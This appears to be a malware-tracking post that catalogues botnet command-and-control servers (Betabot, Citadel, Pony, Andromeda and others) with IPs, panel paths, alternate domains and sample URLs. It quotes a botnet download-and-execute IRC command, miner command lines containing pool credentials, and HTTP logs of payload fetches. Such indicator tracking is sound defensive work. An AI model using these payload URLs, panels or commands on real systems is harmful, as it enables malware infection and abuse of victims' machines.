Resolved: [securityspecialiastinc.in] to [106.187.88.52]
Gate: securityspecialiastinc.in/p/gate.php
Admin: securityspecialiastinc.in/p/admin.php
Sample: hxxp://106.187.88.52/p/p.exe
Online crypter: hxxp://securityspecialiastinc.in/crypt.php
Hosting infos: http://whois.domaintools.com/106.187.88.52
hackattaksuceuse.biz (Betabot http botnet hosted by Fastflux)
Server: hackattaksuceuse.biz
Gate file: /~.homo/analytics.php
Alternate domains:
lavidalocapd.biz
allahwouakbaaahhh.co.in
amemeuch.biz
betazbraxxx.co.in
hacktipucov2.org
jesaispastropkoimettre.org
laradimcrelou.co.in
thebossinfly.org
tktlamifa.co.in
whatdaaafuckinyourhead.biz
x42v72.biz
zbraaadanstfesse.org
suxme.itsprosolutions.org
This is the source of the citadel and pony just posted. I'm not sure why the owner would set up his betabot for fastflux and not his citadel though.
Hosting infos:
;; QUESTION SECTION:
;hackattaksuceuse.biz.
89.163.181.135 (Citadel banking malware hosted by unitedcolo.de)
Server: 89.163.181.135
Gate file: /.~/ineed/stats.php
Config file: /.~/ineed/file.php
They forgot to remove the installation directory: hxxp://89.163.181.135/.~/ineed/install/
Found on the same betabot as the recently posted pony loader.
Hosting infos: http://whois.domaintools.com/89.163.181.135
93.115.85.58 (Pony loader hosted by voxility.net)
Server: 93.115.85.58
Gate file: /pox/stats.php
While investigating a betabot, I found a load of different malware. Here's a pony loader. It downloads files from hxxp://cy-corp.com/pg/
Hosting infos: http://whois.domaintools.com/93.115.85.58
solutionswiki.com (Andromeda http botnet hosted by alibabahost.com)
Resolved solutionswiki.com to 109.163.233.107
Server: solutionswiki.com
Gate file: /pages/image.php
There is also a betabot hosted on the same domain.
Mining infos: dasHosts.exe -a scrypt-jane -o http://37.221.170.226:8344 -O YFicRwX9HpMkVovPPWG3NAJ9Tpom3YeXqC:x
Hosting infos: http://whois.domaintools.com/109.163.233.107
r.gigaionjumbie.biz (Power loader http botnet hosted by digital-forex.net)
Resolved r.gigaionjumbie.biz to 5.199.171.131, 5.199.171.132, 5.199.171.133
Server: r.gigaionjumbie.biz
Gate file: /images/gx.php
Alternate domains: x.dailyradio.su, x.kei.su
Hosting infos:
http://whois.domaintools.com/5.199.171.131
http://whois.domaintools.com/5.199.171.132
http://whois.domaintools.com/5.199.171.133
ilikeithard.tk (Pony hosted in United States Kansas City Datashack Lc)
Resolved: [ilikeithard.tk] to [63.141.253.125]
Panel: hxxp://ilikeithard.tk/Panel/admin.php
Sample: directxex.com/uploads/1632963588.Pony.exe (found by justaguy)
Hosting infos: http://whois.domaintools.com/63.141.253.125
imgay.ddos.es (betabot http botnet hosted by Fastflux)
Server: imgay.ddos.es
Gate file: /h/order.php
Alternate domains: imgay.ddos.cat, imgay.theswat.net
ddos.cat has been linked to botnets before.
Hosting infos:
;; QUESTION SECTION:
;imgay.ddos.es. IN A
;; ANSWER SECTION:
imgay.ddos.es. 149 IN A 94.27.87.58
imgay.ddos.es. 149 IN A 98.195.89.225
imgay.ddos.es. 149 IN A 174.112.126.155
imgay.ddos.es. 149 IN A 176.40.77.176
imgay.ddos.es. 149 IN A 178.150.207.252
imgay.ddos.es. 149 IN
t7v4d.com (IRC botnet hosted in United States Phoenix Secured Servers Llc)
Thanks to this guy for the sample.
Resolved: [t7v4d.com] to [108.170.24.42]
Server: t7v4d.com:4040
Now talking in ##tnt
Topic is '!np hxxp://3rbcool.net/g1.exe DF37A37D9E33FB9904235855863AA5D5 -r'
Hosting infos: http://whois.domaintools.com/108.170.24.42
privatesmartscreen.nl (Bitcoin miner hosted in Netherlands Amsterdam Denkers-ict B.v.)
DNS queries:
privatesmartscreen.nl DNS_TYPE_A 159.253.0.151
HTTP conversations:
159.253.0.151:80 – [privatesmartscreen.nl]
Request: GET /Bitcoin/host.txt
149.210.128.55:80 – [149.210.128.55]
Request: GET /bitconi/winlogon32.exe
Request: GET /bitconi/winlogon64.exe
Request: GET /bitconi/usft_ext.dll
Request: GET /bitconi/miner.dll
Request: GET /bitconi/coinutil.dll
Request: GET /ptx.exe
Request: GET /bitconi/btc.exe
Request: GET /bitconi/phatk.exe
Dutch hacker here: winlogon32.exe" -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321
Samples: